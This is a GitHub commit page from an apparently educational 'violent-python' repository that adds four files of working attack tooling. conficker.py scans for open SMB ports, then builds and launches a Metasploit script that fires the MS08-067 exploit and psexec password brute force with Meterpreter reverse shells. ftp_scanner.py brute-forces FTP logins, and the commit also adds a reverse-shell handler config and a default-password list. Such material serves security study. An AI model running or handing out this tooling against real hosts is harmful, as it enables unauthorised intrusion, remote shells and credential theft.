8000 Add ftpscanner and conficker worm · andreffs18/violent-python@cd21bf5 · GitHub
[go: up one dir, main page]
Skip to content

Commit cd21bf5

Browse files
andreffs18andreffs18
committed
Add ftpscanner and conficker worm
1 parent 68e2665 commit cd21bf5

File tree

4 files changed

+143
-0
lines changed

4 files changed

+143
-0
lines changed

chapter2/conficker.py

Lines changed: 92 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,92 @@
1+
#!/usr/bin/python
2+
# -*- coding: utf-8 -*-
3+
import os
4+
import optparse
5+
import sys
6+
import nmap
7+
8+
9+
def find_hosts(host, port='445'):
10+
scanner = nmap.PortScanner()
11+
scanner.scan(host, port)
12+
hosts = []
13+
for host in scanner.all_hosts():
14+
if scanner[host].has_tcp(int(port)):
15+
if scanner[host]['tcp'][int(port)]['state'] == 'open':
16+
print('[+] Found Target Host: {}'.format(host))
17+
hosts.append(host)
18+
return hosts
19+
20+
21+
def setup_handler(config, local_host, local_port):
22+
config.write('use exploit/multi/handler\n')
23+
config.write('set payload windows/meterpreter/reverse_tcp\n')
24+
config.write('set LPORT {}\n'.format(str(local_port)))
25+
config.write('set LHOST {}\n'.format(local_host))
26+
config.write('exploit -j -z\n')
27+
config.write('setg DisablePayloadHandler 1\n')
28+
29+
30+
def conficker_exploit(config, target_host, local_host, local_port):
31+
config.write('use exploit/windows/smb/ms08_067_netapi\n')
32+
config.write('set RHOST {}\n'.format(target_host))
33+
config.write('set payload windows/meterpreter/reverse_tcp\n')
34+
config.write('set LPORT {}\n'.format(str(local_port)))
35+
config.write('set LHOST {}\n'.format(local_host))
36+
config.write('exploit -j -z\n')
37+
38+
39+
def smb_brute_force(config, target_host, local_host, local_port, username='Administrator', passwords=[]):
40+
for password in passwords:
41+
config.write('use exploit/windows/smb/psexec\n')
42+
config.write('set SMBUser {}\n'.format(username))
43+
config.write('set SMBPass {}\n'.format(password))
44+
config.write('set RHOST {}\n'.format(target_host))
45+
config.write('set payload windows/meterpreter/reverse_tcp\n')
46+
config.write('set LPORT {}\n'.format(str(local_port)))
47+
config.write('set LHOST {}\n'.format(local_host))
48+
config.write('exploit -j -z\n')
49+
50+
51+
def main():
52+
parser = optparse.OptionParser('[-] Usage %prog -H <target host[s]> -l <local port> [-p <local host> -F <password file>]')
53+
parser.add_option('-H', dest='target_host', type='string', help='specify the target address[es]')
54+
parser.add_option('-p', dest='local_port', type='string', help='specify the listen port')
55+
parser.add_option('-l', dest='local_host', type='string', help='specify the listen address')
56+
parser.add_option('-F', dest='password_file', type='string', help='password file for SMB brute force attempt')
57+
58+
(options, args) = parser.parse_args()
59+
60+
if options.target_host is None or options.local_host is None:
61+
print(parser.usage)
62+
exit(0)
63+
64+
local_host = options.local_host
65+
local_port = options.local_port
66+
if not local_port:
67+
local_port = '1337'
68+
69+
with open('meta.rc', 'w') as configFile:
70+
setup_handler(configFile, local_host, local_port)
71+
72+
password_file = options.password_file
73+
passwords = open(password_file, "r").readlines()
74+
passwords = list(map(lambda l: l.strip(), passwords))
75+
76+
target_hosts = find_hosts(options.target_host)
77+
print("[*] Found {} hosts from given {}".format(len(target_hosts), options.target_host))
78+
if not len(target_hosts):
79+
exit(0)
80+
81+
for host in target_hosts:
82+
print("[*] Testing host {}...".format(host))
83+
conficker_exploit(configFile, host, local_host, local_port)
84+
smb_brute_force(configFile, host, local_host, local_port, passwords=passwords)
85+
86+
os.system('msfconsole -r meta.rc')
87+
88+
89+
if __name__ == '__main__':
90+
main()
91+
# run as follows:
92+
# $ python conficker.py -H 192.168.1.30-50 -l 192.168.1.3 -F passwords.txt

chapter2/ftp_scanner.py

Lines changed: 40 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,40 @@
1+
#!/usr/bin/python
2+
# -*- coding: utf-8 -*-
3+
import ftplib
4+
from optparse import OptionParser
5+
6+
7+
def ftp_login(hostname, username, password):
8+
try:
9+
ftp = ftplib.FTP()
10+
ftp.connect(hostname, 21)
11+
ftp.login(username, password)
12+
print('[+] {} FTP Login Succeeded with {}:{}'.format(hostname, username, password))
13+
ftp.quit()
14+
return username, password
15+
except Exception as e:
16+
pass
17+
18+
print('[-] Could not brute force FTP credentials {}:{}'.format(username, password))
19+
return None, None
20+
21+
22+
if __name__ == "__main__":
23+
parser = OptionParser('usage %prog -H <target host> -F <password lis>')
24+
parser.add_option('-H', dest='target_host', type=str, help='Specify target host.')
25+
parser.add_option('-F', dest='password_file', type=str, help='Specify file containing all possible user:passwords combinations.')
26+
27+
(options, args) = parser.parse_args()
28+
29+
if options.target_host is None or options.password_file is None:
30+
print(parser.usage)
31+
exit(0)
32+
33+
fn = open(options.password_file, "r")
34+
for line in fn.readlines():
35+
username = line.split(':')[0]
36+
password = line.split(':')[1].strip('\r').strip('\n')
37+
print("[*] Testing: {}:{}".format(username, password))
38+
ftp_login(options.target_host, username, password)
39+
40+
print(options)

chapter2/meta.rc

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,6 @@
1+
use exploit/multi/handler
2+
set payload windows/meterpreter/reverse_tcp
3+
set LPORT 1337
4+
set LHOST 192.168.1.0
5+
exploit -j -z
6+
setg DisablePayloadHandler 1

chapter2/userpass.txt

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
administrator:password
2+
admin:12345
3+
root:secret
4+
guest:guest
5+
root:toor

0 commit comments

Comments
 (0)
0